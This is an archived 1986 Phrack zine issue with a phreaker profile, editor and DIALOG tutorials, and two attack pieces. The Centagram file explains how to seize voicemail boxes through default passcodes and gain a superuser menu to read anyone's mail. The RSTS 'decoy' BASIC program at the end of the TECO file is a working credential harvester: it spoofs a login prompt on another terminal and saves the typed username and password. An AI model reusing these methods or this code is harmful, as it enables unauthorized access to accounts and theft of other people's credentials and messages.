home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Phrack / Phrack Issue 09.sit / Phrack Issue 09
Text File  |  1993-02-08  |  94KB  |  2,336 lines

  1.  
  2.  
  3.                                ==Phrack Inc.==
  4.  
  5.                     Volume One, Issue Nine, Phile #1 of 10
  6.  
  7.                                  Introduction
  8.                                  """"""""""""
  9.  
  10.          Welcome, after an ever-too-long gap, to Phrack Inc. Issue Nine!  Yes,
  11. I've waited too long to do this, but hey, what can I say.  We have it together
  12. now and the file content is quite good, with some unique new writers as well
  13. as some old ones popping up again.  Let me once again stress that ANYONE can
  14. write for Phrack Inc.  You aren't required to be on a particular board, much
  15. less a board at all, all you need is some means to get the file to us, as we
  16. do not discriminate against anyone for any reason.  This Phrack issue contains
  17. the following:
  18.  
  19. #1  Introduction to Phrack Inc. Issue Nine by Taran King (1.4K)
  20. #2  Phrack Pro-Phile on The Nightstalker by Taran King (6.4K)
  21. #3  Fun With the Centagram VMS Network by Oryan Quest (3.9K)
  22. #4  Programming RSTS/E File2: Editors by Solid State (12.9K)
  23. #5  Inside Dialog by Ctrl C (8.4K)
  24. #6  Plant Measurement by The Executioner (12.8K)
  25. #7  Multi-User Chat Program for DEC-10's by TTY-Man and The Mentor (6.5K)
  26. #8  Introduction to Videoconferencing by Knight Lightning (10.5K)
  27. #9  Loop Maintenance Operations System by Phantom Phreaker and Doom Prophet
  28.     (17.2K)
  29. #10 Phrack World News VIII by Knight Lightning (16.3K)
  30.  
  31.                                ==Phrack Inc.==
  32.  
  33.                     Volume One, Issue Nine, Phile #2 of 10
  34.  
  35.                            ==Phrack Pro-Phile VI==
  36.  
  37.                       Written and Created by Taran King
  38.  
  39.                                    9/28/86
  40.  
  41.          Welcome to Phrack Pro-Phile VI.  Phrack Pro-Phile is created to bring
  42. info to you, the users, about old or highly important/controversial people.
  43. This month, I bring to you a particularly influential user from days of old...
  44.  
  45.                                The Nightstalker
  46.                                ~~~~~~~~~~~~~~~~
  47.  
  48.          The Nightstalker was involved with Tap and 8080B, the first home
  49. computer which he helped build for NY Telephone.
  50. ------------------------------------------------------------------------------
  51. Personal
  52. ~~~~~~~~
  53.              Handle: The Nightstalker
  54.        Past handles: Stainless Steel Rat, The Old Wazoo, C.T.
  55.       Handle origin: TV movie and series called "The Nightstalker"
  56.       Date of Birth: 12/51
  57. Age at current date: 34 years old
  58.              Height: 6'+
  59.              Weight: 200+ lbs.
  60.           Eye color: Blue-Green
  61.          Hair Color: Brownish-Black
  62.           Computers: ALTAIR 8080B, Apple IIe, Commodore 64
  63.  
  64. ------------------------------------------------------------------------------
  65.          The Nightstalker started in the phreak world in 1971 due to the
  66. Esquire article on blue boxes and YIPL magazine.  He obtained his first blue
  67. box by January, 1972.  He started hacking in 1975 after obtaining a TI Silent
  68. 700 Series, Model 700 exceedingly dumb terminal.  He stumbled upon ARPAnet in
  69. Massachusetts, the bridge at MIT...1 hour later, he figured out how to get
  70. on.  He toyed with the MIT exchange and found the MULTICS system and their
  71. artificial intelligence system.  They were just beginning to use a language
  72. called LISP at the time.  He also helped with the building of the ALTAIR
  73. 8080B, holding 22 slots for cards 4 inches thick, 18 of which were used to get
  74. 16K on the computer.  He helped out NY Telephone with "Let's Get Together", a
  75. game at fairs which utilized Area Codes for answers.  He also was involved
  76. with the standard old phone phreak tricks like a loop around the world from
  77. one phone booth to the one next to it.  His first computer was a Commodore 64
  78. due to the cost to him (free) and it was easier to upgrade than the Apple IIe
  79. (pick up a brochure on Commodore and see how many voices it has as well as the
  80. tone range...I'm sure that it covers 2600 hz quite nicely).
  81.  
  82. Members of the telecom world which he has met include Cheshire Catalyst,
  83. Captain Crunch, Steve Wozniak, and Bill Gates (head of Microsoft).  He has met
  84. many phone phreaks at science fiction conventions, but doesn't know them by
  85. name or handle.
  86.  
  87. -------------------------------------------------------------------------------
  88.  
  89.         Interests: Telecommunications (modeming, phreaking, hacking),
  90.                    telecomputing, science fiction, short wave radio, scanner
  91.                    listening, classic music, and shooting.
  92.  
  93. The Nightstalker's Favorite Things
  94. ----------------------------------
  95.  
  96.            Women: Goes without saying; preferably ones involved in science
  97.                   fiction as an interest or a hobby.
  98.      Sci-Fi Cons: He attends many and has met many phreaks through them.
  99. Short wave radio: As previously mentioned, scanning.
  100.             Hack: A classic hack (scam), participating in or hearing of.
  101.          Anarchy: Confusing people with authoritative positions.
  102.         Shooting: Target shooting or machine guns.
  103.   Space programs: Obsessed since Sputnik program.
  104.  
  105. Most Memorable Experiences
  106. --------------------------
  107.  
  108. Machine gun gallery in Atlanta, Georgia.  Lots of fun!
  109. First time he hacked his way into a trade show.
  110. Boxing a call to AUTOVON and to Lebanon during U.S. occupancy and billed the
  111.   call to the local KKK member.
  112.  
  113. Some People to Mention
  114. ----------------------
  115.  
  116. Ron Rosenbaum (wrote the Esquire article on Blue Boxes [all his fault]).
  117. Various science fiction authors.
  118. Wozniak and Jobs (for inventing the Apple).
  119. MIT (for inventing the Altair computer).
  120. Marx Brothers (for his anarchial views towards bureaucracy).
  121. Robert Shea and Robert Anton Wilson (wrote Illuminatus Trilogy [recommended]).
  122. John Draper (for showing us all how it was done).
  123. Original MIT Hackers (for showing us the light).
  124. AT&T (for providing us with this wonderful Network).
  125.  
  126. ------------------------------------------------------------------------------
  127.  
  128. The Nightstalker is not fond of the current society that claims themselves as
  129. hackers or phreakers but don't learn the systems themselves.  These aren't the
  130. real hackers that sit down and literally hack away at a system.  Pirates
  131. aren't hackers.  Just because you have a computer doesn't mean you're a
  132. hacker.  Another thing he's displeased about is the term "hacker" used by the
  133. media as anyone owning a computer.  He considers the people that destroy
  134. systems criminals and fiends, not hackers.  Those that find the back doors and
  135. something unknown about a system non-malevolently or without profit in mind
  136. are true hackers and phreakers.
  137.  
  138. About computers, The Nightstalker has strong feelings about the symbolisms of
  139. the brand names as status symbols in society.  He feels, rather than buying
  140. the computer because it's the most expensive, the neatest looking, or what
  141. everyone else has, you should buy it for it's capabilities which can help you
  142. rather than hypothetical situations many computer advertising agencies use.
  143.  
  144. ------------------------------------------------------------------------------
  145.  
  146. I hope you enjoyed this phile, look forward to more Phrack Pro-Philes coming
  147. in the near future.  ...And now for the regularly taken poll from all
  148. interviewees.
  149.  
  150. Of the general population of phreaks you have met, would you consider most
  151. phreaks, if any, to be computer geeks?  He feels that the term, "computer
  152. geek" or closer, "geek" is too relative to be able to generalize.  There have
  153. been people that he's met, though, that he'd not wish to exist on the same
  154. planet with.  Thanks for your time, Mr. Nightstalker.
  155.  
  156.                                             Taran King
  157.                                    Sysop of Metal Shop Private
  158.  
  159.                                ==Phrack Inc.==
  160.  
  161.                     Volume One, Issue Nine, Phile #3 of 10
  162.  
  163.                    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  164.                    %                                     %
  165.                    %  Oryan Quest presents...            %
  166.                    %                                     %
  167.                    %  Fun With the Centagram VMS Network %
  168.                    %                                     %
  169.                    %  Written 10/13/86 for Phrack Inc.   %
  170.                    %                                     %
  171.                    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  172.  
  173.  
  174. Introduction:
  175.  
  176.      Centagram VMS networks are located throughout the country. This file will
  177. briefly outline ways of defeating all Centagram security and how to become a
  178. superuser. I take full responsibility for any deaths, injuries, or venereal
  179. diseases resulted from use of the information in this file.
  180.  
  181.  
  182. Finding the idle VMS:
  183.  
  184.      Generally, the easiest way to find an idle VMS is by scanning the last
  185. digits in the net (ie: XX99, XX98, XX97 etc.). The idle VMS will identify
  186. itself by saying, "Please leave your message at the tone" or something to that
  187. effect in a clear, female, synthesized voice. It will not sound unclear in any
  188. way. AHA! You've found your victim.
  189.  
  190.  
  191. Attacking the idle VMS:
  192.  
  193.      While the "Please leave.." message is playing, hit 0. It will ID itself
  194. as "Mailbox XX99, please enter your passcode". If the mailbox does not say the
  195. above message then DON'T fuck with it. It is probably in use and any effort
  196. you make to hack it will be useless because it will just get taken over again.
  197. At this point, you must hack a 4 digit passcode. The usual defaults are as
  198. follows are 5000, 9876, 1234, and any # is that order. Usually, most accept
  199. 1000, 2000, 3000, etc. I don't think 4 digits is to much to ask. W0W! Your in!
  200. It will then tell you how to change your passcode and generally customize your
  201. newly stolen VMS.
  202.  
  203.  
  204. Hopping around the net:
  205.  
  206.      Suppose you have a friend that has mailbox 5286 and want to read his mail
  207. (if you have their passcode) or just want to listen to their announcement. You
  208. enter 9 on your VMS command module to logoff while it is saying "You have X
  209. messages remaining. Bye!" you enter the # or a 0. It will then ask you for a
  210. four digit extension. You enter 5286 and WHAM! you get their announcement.
  211. Now, wasn't that fun.
  212.  
  213.  
  214. Becoming the superuser:
  215.  
  216.      So, you want to fly higher than no man has ever done before; you want to
  217. leap high building in a single bound; you want to be a stud. Well, listen to
  218. Oryan, he'll tell you how. Well, remember how you jumped across the net?? You
  219. follow the same procedure but, when it asks you for a four digit extension,
  220. you enter 9999 or 9998 or even 0000. If you were successful, it will ask you
  221. for a second four digit extension. You will have to hack this one on your own.
  222. But, I have found on at least 3 nets that it was 1986 or 1987. Gee, people are
  223. dumb aren't they? Once you hacked this, it will give you an expanded menu.
  224. WOW! You can now, read anyone's mail, take over VMS's and disconnect VMS's.
  225. Other commands depend on the net. But you can bet there are always a bunch of
  226. k-rad commands!
  227.  
  228.  
  229. Conclusion:
  230.  
  231.      I hope you have enjoyed this file. Watch for updated versions in Phrack.
  232. If you have problems finding Centagrams, here are a few nets: 214-733-XXXX,
  233. 415-647-XXXX, 408-790-XXXX. I can be reached at 214-733-5294. Don't play with
  234. my net. If I see idle mailboxes getting taken over I will just get rid of
  235. them. There are plenty of other networks. Special thanks to: Taran King Knight
  236. Lightning, SJE, The Egyptian Lover, and Ryche. Some added notes: Call the
  237. Attila the Hun/Master Blaster loser line at 214-733-5283.
  238.  
  239.  
  240.                     (C) Quest/Sentry Productions 10/13/86
  241.  
  242.                                ==Phrack Inc.==
  243.  
  244.                     Volume One, Issue Nine, Phile #4 of 10
  245.  
  246.   $$$$$$$$$$$$$$$$$$$$$$$$
  247.   $  PROGRAMMING RSTS/E  $
  248.   $    File2: Editors    $
  249.   $ by:                  $
  250.   $      Solid State     $
  251.   $$$$$$$$$$$$$$$$$$$$$$$$
  252.  
  253.   Written (c) Oct 11, 1986
  254.   ------------------------
  255.  
  256.    Within this article I will be focusing on the TECO text editor found on
  257. almost every installation of RSTS that you will pass by today. I feel it is
  258. unneeded to do a write up on the other editors such as EDT, a screen editor
  259. for VT100 and VT52 terminals, and EDFOR, a FORTRAN text editor, as most
  260. hackers will not have the proper hardware/software at their disposal.
  261.    This file does not contain many tricks, but has straightforward information
  262. that most assuredly can be found in the user manual. Since not everyone has
  263. access to help documents though, this file will provide a base for the first
  264. time editor user and hopefully a reference for the experienced. If you feel
  265. otherwise.. don't waste your time reading it.
  266.    Following the main portion of the file is an updated copy of the decoy
  267. trick I promised to revise that was featured in my first file. Hopefully, (I
  268. am not promising though), I have succeeded in removing all the bugs this time.
  269.  
  270. USES
  271. ====
  272.  
  273.    A text editor, for those of you that happen to be brain dead, is a utility
  274. similar to the word processor you use everyday on your micro: it allows a
  275. person to create, modify, and compile text files. But, also can edit, and if
  276. need be, create program files. For these reasons and many others, knowing how
  277. to use an editor thoroughly can be a major advantage to the hacker on future
  278. explorations.
  279.  
  280. EXECUTING
  281. =========
  282.  
  283.    Typing TECO invokes the TECO text editor. If TECO is just typed without any
  284. modifiers, then the file edited last will be placed in the editing buffer.
  285. (More on this subject can be found below under MEMORY.) To edit a different
  286. file, or create a new file, the following forms are used:
  287.  
  288. TECO filename.ext                  To edit an existing file.
  289. TECO outfile.ext=infile.ext        To edit from one file to another.
  290. MAKE filename.ext                  To create a new file.
  291.  
  292.    Other ways to execute TECO involve VT terminals, but we are not going into
  293. that much detail within this text.
  294.  
  295. INITIALIZATION
  296. ==============
  297.  
  298.    If there is a file named TECO.INI in your directory when TECO is invoked,
  299. it is assumed to be the macro settings for a VT terminal. We don't need to
  300. bother with those, so make sure to disable the search by appending the switch
  301. /NOINI on execution.
  302.  
  303. MEMORY
  304. ======
  305.  
  306.    Each time TECO is executed, the name of the file being edited is placed
  307. into another file titled TECFnn.TMP where nn is your job number. If you invoke
  308. TECO and wish to edit a file different than the one currently in the memory
  309. file, select the switch /NOMEMORY.
  310.  
  311. MODIFIERS
  312. =========
  313.  
  314.    There are a number of options, called switches, which modify the execution
  315. of the TECO utility. Some like /NOINI and /NOMEMORY I have previously
  316. mentioned. Other important switches follow along with a short description of
  317. each. To select one of these options, append it to the call string when you
  318. invoke TECO:
  319.  
  320. TECO filename.ext /[option1] /[option2] ...
  321.  
  322. /FIND                              This places the pointer at
  323.                                     the last marked position
  324.                                     within the input file.
  325. /INSPECT                           If selected, you can only
  326.                                     read the file, not edit.
  327.  
  328.    There are a few more that deal with the VT terminals, but as I've said
  329. already, there is really no need to list them.
  330.  
  331. INTERRUPT
  332. =========
  333.  
  334.    The control character 'C' (CTRL/C or ^C -which it shall from now on be
  335. referred to as.) is used to halt the execution of the current TECO command,
  336. the same as it does in the BASIC monitor. If ^C is typed twice without a TECO
  337. command in between, the utility is aborted. (You are returned to the keyboard
  338. monitor whichever it was.. eg. BASIC, BASIC+2, RSX..)
  339.  
  340. COMMAND EXECUTION
  341. =================
  342.  
  343.    When TECO is called, you will receive the  *  prompt. This is the command
  344. prompt. Almost all commands used by the editor are one or two characters in
  345. length and are typed in using a normal ASCII keyboard. To terminate a TECO
  346. command the <ESCAPE> sequence is used. When typed, it will echo back as a  $
  347. character. Two consecutive <ESCAPE>s must be entered before a command will be
  348. carried out. This allows you to string together a line of commands like:
  349.  
  350. * [command1]$[command2]$[command3]$ ... $$
  351.  
  352. COMMANDS
  353. ========
  354.  
  355.  ]Moving the Pointer[
  356.  
  357.    The text pointer is used to represent where you are working, ie. if you
  358. were to enter a command, what part of the text it would affect. It's similar
  359. to the job your cursor does when writing a program on your micro.
  360.  
  361. 'J'
  362.  
  363.    The "J" command is used to move the text pointer to the beginning or end of
  364. the editing buffer.
  365.  
  366.    BJ     Move to the beginning of the buffer.
  367.    ZJ     Move to end of the editing buffer.
  368.  
  369. 'L'
  370.  
  371.    The "L" command moves the text pointer from one line to another. Common
  372. forms of the command are:
  373.  
  374.    L      Move to beginning of the next line.
  375.    0L     Move to front of current line.
  376.    3L     Move to the third line down from the current line.
  377.   -1L     Move back to previous line. (One above current.)
  378. ...
  379.  
  380. 'C'
  381.  
  382.    The "C" command is used to move the text pointer past a specified number of
  383. characters, forward or backwards, on the current line. Common forms include:
  384.  
  385.    C      Advance the pointer to the next character.
  386.    5C     Move the pointer forward five characters.
  387.   -5C     Move back five characters.
  388. ...
  389.  
  390.  ]Listing Text[
  391.  
  392.    There is one command with a couple various forms to list the text within
  393. the editor; they follow.
  394.  
  395. 'T'
  396.  
  397.    The "T" is used to list text from the editing buffer. Commonly found forms
  398. are:
  399.  
  400.    HT     Print the entire contents of the editing buffer.
  401.    T      Type text from the pointer to the end of the current line.
  402.    0T     Type text from the beginning of the line to the text pointer.
  403.    5T     Print the next five lines of text from the buffer, starting where
  404.            the pointer is located.
  405. ...
  406.  
  407.  ]Entering Text[
  408.  
  409.    What use is an editor if you can't add to the text? There is one command,
  410. insert, which allows you to write. If you are creating a file from scratch,
  411. you would enter the insert command each time you wanted to add a new line to
  412. your document.
  413.  
  414. 'I'
  415.  
  416.    The "I" command is used to insert text into the buffer. After issued, the
  417. text entered will be placed where the text pointer is located. The command is
  418. of the form:
  419.  
  420.    I <text> <ESCAPE>
  421.  
  422. For example, to insert the sentence, "This is an example.", type:
  423.  
  424.    IThis is an example$
  425.  
  426. (Note: Remember that <ESCAPE> echoes back to your screen as $)
  427.  
  428.  ]Deleting Text[
  429.  
  430.    The TECO text editor makes it easy to delete words, sentences, etc. from
  431. the buffer. There are two different commands used, line delete, and letter
  432. delete.
  433.  
  434. 'K'
  435.  
  436.    The "K" issued when you choose to delete lines of text from the editing
  437. buffer. Common forms are as follows:
  438.  
  439.    K      Delete the text from the pointer through the end of the current
  440.            line.
  441.    0K     Delete the text from the beginning of the line to through the
  442.            pointer.
  443.    5K     Omit the following five lines from the buffer.
  444.    HK     Kill the entire contents of the buffer.
  445. ...
  446.  
  447. 'D'
  448.  
  449.    The "D" appropriately is used to delete individual characters. A few of the
  450. forms found are:
  451.  
  452.    D      Delete the character which follows directly after the text pointer.
  453.    5D     Delete the following five characters from the text, starting from
  454.            the pointer.
  455.   -1D     Delete the character directly behind the pointer.
  456. ...
  457.  
  458.  ]Searching[
  459.  
  460.    All good word processors include a routine to search and replace a string
  461. of text. So does the TECO text editor. Two forms are used, the locate text,
  462. and the search and replace text commands.
  463.  
  464. 'S'
  465.  
  466.    The "S" is used to locate a specified string of text currently in the
  467. editing buffer. If the text is found, the pointer is positioned directly after
  468. the specified text. If the string is not found, an error message results and
  469. the text pointer is placed at the beginning of the buffer.
  470.  
  471.    S <text> <ESCAPE>
  472.  
  473. For example, to locate "This is an example.", enter:
  474.  
  475.    SThis is an example.$
  476.  
  477. 'FS'
  478.  
  479.    "FS" for find and replace does exactly that. It searches for a specified
  480. string of text, and if found replaces it with another sting of text. If the
  481. specified text is not found though, the pointer is positioned at the beginning
  482. of the buffer just like the "S" command. The "FS" command is of the form:
  483.  
  484.    FS <old text> <ESCAPE> <new text> <ESCAPE>
  485.  
  486. For an example, to replace "hullo" with "hello!", use the command:
  487.  
  488.    FShullo$hello!$
  489.  
  490.  ]Saving[
  491.  
  492.    To save the new version of the file which you have been editing, you enter
  493. the exit command and it shall be saved in your directory. Remember though, if
  494. you wish to quit but not replace a file with your edited version, just type ^C
  495. twice.
  496.  
  497. 'EX'
  498.  
  499.    The "EX" command is used to write the current buffer to the output file,
  500. then exit from TECO. For example:
  501.  
  502.    EX$$
  503.  
  504. (Note: Remember that <ESCAPE> is echoed as $, and typing <ESCAPE> twice causes
  505. a command to be executed.)
  506.  
  507. FLAGS
  508. =====
  509.  
  510.    The TECO text editor is not limited to the commands already shown. The
  511. editor has a few flags which can be entered at the  *  prompt that will modify
  512. the TECO environment.
  513.    To examine the value of a flag type:
  514.  
  515.    [flag]x
  516.  
  517. Where [flag] is the specified flag and x is a numeric argument which returns
  518. text. To set the value of a flag enter:
  519.  
  520.    x[flag]
  521.  
  522. Where x is the number or command being specified for the flag [flag].
  523.  
  524. 'EH'
  525.  
  526.    EH is the error handling flag. Here's the table of arguments and their
  527. meanings:
  528.  
  529. Value     Meaning
  530.  
  531.     1     If an error is encountered within the operation of TECO, only the
  532.            3-character error code is printed.
  533.     2     If an error is encountered during operation, a short message
  534.            explaining the error is printed. (default setting)
  535.     3     If an error is encountered, the command(s) which led to the error
  536.            are printed.
  537.  
  538. 'ET'
  539.  
  540.    ET, or Edit Terminal, is the command for modifying terminal output. Table
  541. of arguments follows:
  542.  
  543. Value     Meaning
  544.  
  545.     1     Output is in image mode.
  546.     2     Terminal in use is a scope.
  547.     4     Terminal in use has lowercase available.
  548.     8     ^T is read without echo.
  549.    16     Cancels ^O during output.
  550.   128     TECO aborts if an error is encountered.
  551.   256     Output to screen is truncated to the terminal's width.
  552.   512     VT terminal support available.
  553.  1024     (same as above)
  554. 32768     Traps ^C
  555.  
  556. '^X'
  557.  
  558.    ^X, the last flag I'll mention, deals with searches. (Look above for the
  559. command to search.)
  560.  
  561. Value     Meaning
  562.  
  563.     0     Either case matches during searches.
  564.     1     An exact case match is required to complete a search.
  565.  
  566.  
  567. CONCLUSION
  568. ==========
  569.  
  570.    That just about wraps up the TECO text editor.. boring eh? But as I've said
  571. time and again, editors are important to hackers.
  572.  
  573.  Till next time...
  574.  
  575.    Solid State
  576. >>>PhoneLine Phantoms!
  577.  
  578. _______________________________________________________________
  579. File1- Addendum:
  580.  
  581.    Here's the updated version of the decoy program (yeah, the one that had an
  582. error!) that was featured in File1. The concept of this revision is slightly
  583. different, but it 'should' work more efficiently and easily than the first.
  584.    To execute the program, first do a SYstat and record the KB numbers of
  585. potential targets. Run the program, and enter the number of the KB only..
  586. (Don't hang up!) ..then just wait till the program has ended and then check
  587. the output file.
  588.  
  589. Note: This listing will not without modification work on all systems or under
  590.       all conditions.
  591.  
  592.  
  593. 1 ! R S T S decoy
  594. 10 EXTEND
  595. 100 ON ERROR GOTO 1000
  596. 120 PRINT CHR$(140):PRINT:PRINT
  597. 130 INPUT "To which keyboard (KB)";K$
  598. 140 K$=CVT$$(K$,4%)
  599. 200 OPEN "KB:"+K$ AS FILE #1%
  600. 220 INPUT LINE #1%,A$
  601. 230 IF CVT$$(A$,4%)="" THEN 220
  602. 240 PRINT #1%
  603. 240 PRINT #1%,"RSTS"
  604. 250 PRINT #1%
  605. 260 PRINT #1%,"User: ";
  606. 270 INPUT LINE #1%,U$:U$=CVT$$(U$,4%)
  607. 280 T$=SYS(CHR$(3%))
  608. 290 PRINT #1%,"Password: ";
  609. 300 INPUT LINE #1%,P$:P$=CVT$$(P$,4%)
  610. 310 Z$=SYS(CHR$(2%))
  611. 320 PRINT #1%
  612. 330 PRINT #1%,"Invalid entry - try again":PRINT #1%
  613. 340 CLOSE #1%
  614. 400 OPEN "DATA.TXT" FOR OUTPUT AS FILE #2%
  615. 410 PRINT #2%,U$;";";P$
  616. 420 CLOSE #2%
  617. 999 END
  618. 1000 PRINT "?ERROR line #";ERL:STOP
  619.  
  620.                          ==Phrack Inc.==
  621.  
  622.               Volume One, Issue Nine, Phile #5 of 10
  623.  
  624.        <*************************************************>
  625.        <*                                               *>
  626.        <*                Inside Dialog                  *>
  627.        <*                     By                        *>
  628.        <*                   Ctrl C                      *>
  629.        <*       Advanced Telecommunications Inc.        *>
  630.        <*                                               *>
  631.        <*************************************************>
  632.  
  633.  
  634.  
  635.      DIALOG  is  one  of the  largest  online  databases.  DIALOG
  636. currently  provides  access  to over 250 databases  containing  a
  637. total  of over  100  Million  records.  The  range of information
  638. available is enormous.
  639.  
  640.  
  641. BEGIN:
  642.      The  BEGIN  command starts a search and tells  Dialog  which
  643. database you want it to check out.  The BEGIN command is followed
  644. (without  a  space) by the file number of the database you  want.
  645. Either  of  the following ways could get you into  the  file  229
  646. (Drug information):
  647.  
  648.      Begin229
  649.      or
  650.      B229
  651.  
  652.      Dialog will then put the date,  the time,  your user number,
  653. and what it costs for  the  database you just left.  For example,
  654. if you move from ERIC (file 1)  to Management  Contents (file 75)
  655. it would look like this:
  656.  
  657. -------------------------------------------------------
  658.  
  659. ? b75
  660.                     28sep86 13:59:25 User08331
  661.          $0.10      0.00 Hrs File1
  662.          $0.02      Uninet
  663.          $0.12      Estimated Total Cost
  664. File75:Management Contents - 74-86/Sep
  665. (Corp. Management Contents Inc.)
  666.           Set  Items     Description
  667.           ___  _____     ___________
  668.  
  669. -------------------------------------------------------
  670.  
  671. EXPAND:
  672.      The  EXPAND  command is used to pick keywords for a  search.
  673. You  can search for any word;  but knowing how common a  word  is
  674. gives you a good idea where to start your search.
  675.  
  676.      All databases have a index of searchable words.  You can see
  677. if there are any words of the same spelling to a keyword you want
  678. to search for. For example:
  679.  
  680. -------------------------------------------------------
  681.  
  682. ? Expand Drink
  683. Ref  Items     Index-term
  684. E1       1     Drina
  685. E2       1     Drinfeld
  686. E3      31    *Drink
  687. E4       2     Drinkers
  688.  .       .        .
  689.  .       .        .
  690.  .       .        .
  691. E12      3     Dripping
  692.  
  693. -------------------------------------------------------
  694.  
  695.      The  word  -more- at  the bottom of the  screen  means  that
  696. typing Page or P will display another screen of information.
  697.  
  698. SELECT:
  699.      When  you find the word you want to search for,  you use the
  700. SELECT  command  to  tell the database what to  search  for.  The
  701. SELECT command can be followed with one or more search terms.
  702.  
  703. SELECT STEP:
  704.      The  SELECT STEP command works just like the SELECT command,
  705. except the files it finds are listed separately.
  706.  
  707. -------------------------------------------------------
  708.  
  709. ? SS television? OR tv
  710.           1    21347     TELEVISION
  711.           2    6376      TV
  712.           3    22690     1 or 2
  713. ? SS s3 AND violen? AND child?
  714.           4    1680      VIOLEN?
  715.           5    20577     CHILD?
  716.           6    38        3 AND 4 AND 5
  717.  
  718. -------------------------------------------------------
  719.  
  720. TYPE and DISPLAY:
  721.      There are two commands, TYPE and DISPLAY, that you  can  use
  722. to look over the information you have found.   The  difference is
  723. the TYPE command causes a non-stop list of  the information.  The
  724. DISPLAY lets the information to list a page at a time,  you  have
  725. to type PAGE or P to see the next page.
  726.  
  727.      DIALOG offers nine formats to display retrieved files.
  728.  
  729.      Format    Parts of Record Listed
  730.      ~~~~~~    ~~~~~ ~~ ~~~~~~ ~~~~~~
  731.      1         Accession Number
  732.      2         Complete record except abstract
  733.      3         Bibliographic citation
  734.      4         File dependent
  735.      5         Complete record
  736.      6         Accession number and title
  737.      7         Bibliographic citation and abstract
  738.      8         Accession number, title, and indexing
  739.      9         File dependent
  740.  
  741.  
  742.  
  743. LOGOFF:
  744.      The   LOGOFF   command  has  no  abbreviation.   It's   self
  745. explanatory.
  746.  
  747.  
  748.      DIALOG is has help commands,  typing ?HELP, or ?EXPLAIN will
  749. give you help.
  750.  
  751. -------------------------------------------------------
  752.  
  753. ? ?EXPLAIN
  754.  
  755. Valid EXPLAIN commands are:
  756.  
  757. Basic Commands:
  758.  
  759. ?BEGIN    ?ENDSDI   ?MAPRN    ?SCREEN
  760.  
  761. ?COMBINE  ?EXPAND   ?ORDER    ?SELECT
  762.  
  763. ?COST     ?KEEP     ?PAGE     ?SFILES
  764.  
  765. ?DISPLAY  ?LIMIT    ?PRINT    ?SORT
  766.  
  767. ?DS       ?LIST     ?REVIEW   ?TYPE
  768.  
  769. ?ENDSAVE  ?LOGOFF
  770.  
  771.                   ***
  772.  
  773. News/Status:
  774.  
  775. ?DIALINDX ?FILESUM  ?ONTAP    ?SUBSCRIP
  776.  
  777. ?DISCOUNT ?HELP     ?RATES    ?SUPPLRS
  778.  
  779. ?EXPLAIN  ?INSTRUCT ?SCEDULE  ?TOLLFREE
  780.  
  781. ?FILES    ?MESSAGE  ?SDI      ?TRUNCATE
  782.  
  783. ?FILESAZ  ?NEWS     ?SEMIARS  ?UPDATE
  784.  
  785.                   ***
  786.  
  787. Telecommunication Access:
  788.  
  789. ?ACCESS   ?DIALNET  ?SABD     ?TRANSPAC
  790.  
  791. ?DARDO    ?FINNPAK  ?TELENET  ?TWX
  792.  
  793. ?DATAPAC  ?IDAS     ?TELEPAKD ?TYMNET
  794.  
  795. ?DATEX    ?NORPAC   ?TELEPAKS ?UNINET
  796.  
  797.           ?PSS      ?TELEX    ?WATS
  798.  
  799.                   ***
  800.  
  801. File Information:
  802.  
  803. ?FIELDn*  ?FILEn*   ?LIMITn*  ?RATESn*
  804.  
  805. *Enter desired file# in place of the n
  806.  
  807.                   ***
  808.  
  809. Training (DIALOG Service):
  810.  
  811. ?TRAIN (For information on DIALOG
  812.  
  813.         training sessions, including
  814.  
  815.         descriptions of particular
  816.  
  817.         training sessions.)
  818.  
  819.                   ***
  820.  
  821. Training (Database Suppliers):
  822.  
  823. ?ANZNEWS  (Australia/New Zealand)
  824.  
  825. ?CANNEWS  (Canada)
  826.  
  827. ?EURNEWS  (Europe)
  828.  
  829. ?KINONEWS (Kinokuniya Japan)
  830.  
  831. ?MMCNEWS  (Masis Japan)
  832.  
  833. ?USNEWS   (United States)
  834.  
  835.                   ***
  836.  
  837. Online User Group News:
  838.  
  839. ?CANOUG   ?OUGNEWS  MMCOUG    ?USOUG
  840.  
  841. ?EUROUG
  842.  
  843. -------------------------------------------------------
  844.  
  845. Logging on
  846.  
  847. For:           Type:
  848. Telenet        C 41520
  849.                C 41548
  850.                C 213170
  851.                C 213236
  852. Tymnet         DIALOG
  853. UNINET         DIALOG
  854. Dialnet        DIALOG
  855.  
  856. To dial directly:
  857.  
  858. Baud:          Number:
  859. 300            415/858-2575
  860. 300            415/858-2461
  861. 1200(Bell 202) 415/858-2421
  862. 1200(Bell 212A)415/858-0511
  863. 1200(Bell 212A)415/858-2460
  864. 1200(VADIC)    415/858-2391
  865.  
  866. WATS:
  867.  
  868.  1-800/847-1620
  869.  1-800/792-6680
  870.  
  871. When it connects type P.
  872.  
  873. When  you  connect  it  will  say  ENTER  YOUR  DIALOG  PASSWORD.
  874. Passwords  are  usually eight letters long.   When you  type  the
  875. correct password you will see something like this:
  876.  
  877.  
  878. -------------------------------------------------------
  879.  
  880. ENTER YOUR DIALOG PASSWORD
  881. XXXXXXXX  LOGON File1 Sun 28sep86 18:35:12 Port866
  882.  
  883. ** FILES 13,104 & 139 ARE UNAVAILABLE  **
  884. ** FILE 262 SROTS ARE NOT WORKING   **
  885. ** FILES 7 AND 50 ARE NOT WORKING   **
  886.  
  887. And a bunch more shit..
  888.  
  889. -------------------------------------------------------
  890.  
  891.      When  the announcements are done,  you are given a  question
  892. mark  (?).  The  first  command  you will want is to  move  to  a
  893. database.  This is done by typing B(no space) and a the  database
  894. number.
  895.  
  896. -------------------------------------------------------
  897.  
  898. ? B296
  899.                28sep86 18:37:22 User08331
  900.      $0.00     0.006 Hrs File1*
  901.      $0.05     Telenet
  902.      $0.05     Estimated Total Cost
  903.  
  904. File296:ONTAP TRADEMARKSCAN - O.G.
  905. (END/SAVE, END/SDI, .EXECUTE, .RECALL, & .RELEASE invalid for file)
  906.           Set  Items     Description
  907.           ---  -----     -----------
  908.  
  909. -------------------------------------------------------
  910.  
  911. I  don't have a list of all the databases,  you'll  just have  to
  912. play around with it.
  913.  
  914.      Here's a few I know of:
  915.  
  916. File Database
  917. ---- --------
  918. 75   Management Contents
  919. 201  ERIC
  920. 204  CA Search
  921. 205  BIOSIS Privews
  922. 208  Compendex
  923. 213  INSPEC
